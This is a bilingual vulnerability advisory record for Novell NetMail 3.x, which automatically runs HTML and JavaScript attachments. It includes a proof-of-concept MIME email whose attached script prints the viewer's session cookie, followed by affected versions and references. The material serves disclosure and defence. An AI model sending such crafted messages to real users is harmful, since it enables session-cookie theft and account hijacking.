https://www.exploit-db.com/exploits/25948
https://www.securityfocus.com/bid/14171
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-079

NovellNetMail是一套电子邮件软件。NovellNetMail存在弱安全机制漏洞。由于NovellNetMail自动处理附件中的HTML，而不提示用户将其保存或打开，这使远程攻击者更易于执行基于web的攻击并窃取cookie。

source: http://www.securityfocus.com/bid/14171/info

Novell NetMail email client is prone to an input validation vulnerability.

Reports indicate that HTML and JavaScript attached to received email messages is executed automatically, when the email message is viewed.

A successful attack may allow the attacker to obtain session cookies and carry out other attacks.

All versions are considered to be vulnerable at the moment. 

Content-Type: multipart/mixed; boundary="=_mixed 00279444C2257036_="

--=_mixed 00279444C2257036_=
Content-Type: text/html; charset="US-ASCII"


<br><font size=2 face="sans-serif">hi there</font>
<br>
--=_mixed 00279444C2257036_=
Content-Type: text/html; name="malxxx.html"
Content-Disposition: attachment; filename="malxxx.html"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<title>Test XSS of uploaded documents</title>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">

</HEAD>
<BODY>
<SCRIPT>
document.write('The cookie is:<br> ' + document.cookie + '<p>');
</SCRIPT>
</BODY></HTML>
--=_mixed 00279444C2257036_=--

Novell NetMail 3.52 C1

Novell NetMail 3.52 C

Novell NetMail 3.52 B

Novell NetMail 3.52 A

Novell NetMail 3.52

Novell NetMail 3.10 h

Novell NetMail 3.10 g

来源:BID
名称:14171
链接:http://www.securityfocus.com/bid/14171
来源:VUPEN
名称:ADV-2005-0994
链接:http://www.frsirt.com/english/advisories/2005/0994
来源:SECUNIA
名称:15962
链接:http://secunia.com/advisories/15962
来源:OSVDB
名称:17821
链接:http://www.osvdb.org/17821
来源:support.novell.com
链接:http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972438.htm
来源:support.novell.com
链接:http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972433.htm
来源:support.novell.com
链接:http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972340.htm
来源:SECTRACK
名称:1014439
链接:http://securitytracker.com/id?1014439